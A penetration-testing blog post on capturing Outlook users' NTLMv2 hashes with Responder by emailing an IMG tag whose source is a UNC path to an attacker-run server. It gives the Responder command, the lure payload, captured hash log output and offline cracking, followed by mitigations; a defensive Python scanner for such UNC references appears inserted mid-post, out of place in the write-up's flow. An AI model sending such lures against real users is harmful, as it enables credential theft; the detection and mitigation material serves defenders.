Responder IMG SRC

Introduction

I haven’t seen too many blog posts on this topic, but I can assure you it’s not particularly original. It is, however, extremely helpful for obtaining credentials during a pentest.

Imagine you’re trying to gain access to a client’s remote access tool (i.e. VPN, Citrix, VMware View, etc.), but you currently don’t have any credentials. You can try your luck and see if you can snag an NTLMv1/NTLMv2 hash to crack.

Explanation

Much like using Responder in any other situation, you can use it to trick the Outlook email client into participating in a challenge-and-response exchange. This requires SMB to be allowed on egress, and the user would have to have the display of remote content enabled.

Here’s a terrible graph to illustrate my point:

[Graph image: attacker sends an email to the target, whose Outlook client connects back to the Responder server over SMB]

Attacker == Red Guy
Target == Blue Guy

Tools

  • Responder
Proof of Concept

We will want to get Responder set up on an internet-facing server.

$ python Responder.py --ip=54.149.221.251 --interface=eth0 --fingerprint --verbose --lm

Next, we’ll want to embed a link to our Responder server into an email as a UNC path in an image tag.

<IMG SRC="\\54.149.221.251\logo.gif" ALIGN="bottom" BORDER="0">

If the target opens the email in Outlook (and provided SMB/CIFS isn’t blocked on egress), the client attempts to fetch the image over SMB and Responder captures the NTLM challenge-response.
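The lure above is easy to spot from the defender’s side: a mail gateway or triage script can flag HTML bodies whose image or link attributes point at a UNC path or file:// URL, since a legitimate newsletter has no reason to load content over SMB. The following scanner is an added example written for this post, not part of Responder or the original write-up; the sample message is constructed and the function names are my own.

```python
import re
from html.parser import HTMLParser

# Attribute values an email client would resolve over SMB: a UNC path such as
# \\54.149.221.251\logo.gif, or a file: URL. An ordinary https:// image does not match.
SMB_REF = re.compile(r"^\s*(?:\\\\[^\\/]|file:)", re.IGNORECASE)

# Attributes through which HTML mail can pull remote content.
REMOTE_ATTRS = {"src", "background", "href"}


class SmbRefFinder(HTMLParser):
    """Collects (tag, attribute, value) for every SMB-resolvable reference."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        for name, value in attrs:
            if name in REMOTE_ATTRS and value and SMB_REF.match(value):
                self.hits.append((tag, name, value))


def find_smb_references(html):
    """Return every tag attribute in an HTML mail body that points at SMB."""
    parser = SmbRefFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


def extract_hosts(hits):
    """Pull the host portion out of each UNC/file reference for alerting or egress blocking."""
    hosts = set()
    for _tag, _attr, value in hits:
        m = re.match(r"^\s*(?:\\\\|file:/*)([^\\/]+)", value, re.IGNORECASE)
        if m:
            hosts.add(m.group(1))
    return hosts


# Constructed sample mail body (not a real message): one SMB lure, one normal image.
SAMPLE_MAIL = (
    "<html><body><p>Please review the attached invoice.</p>"
    '<IMG SRC="\\\\54.149.221.251\\logo.gif" ALIGN="bottom" BORDER="0">'
    '<img src="https://cdn.example.com/footer.png"></body></html>'
)

if __name__ == "__main__":
    hits = find_smb_references(SAMPLE_MAIL)
    print("SMB references:", hits)
    print("Hosts to alert on:", extract_hosts(hits))
```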

05/07/2017 12:24:49 PM - [SMB] NTLMv2 Client : 54.149.221.251
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Username : TEST_DOMAIN\test
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Hash : test::TEST_DOMAIN:9294119132765119:E5C9EB55B7336050C2202552E8872582:01010000000000009E6E35D69FC2D2017E987DD0D566E82100000000020000000000000000000000

We can then crack the captured hashes offline using our preferred wordlist/rule combinations. This should hopefully yield credentials for further activities.

Closing

Here are some mitigations for this problem:

  • Block SMB/CIFS on egress.
  • Disable the automatic downloading of external content in the email client.
  • Implement a more stringent password policy and/or MFA.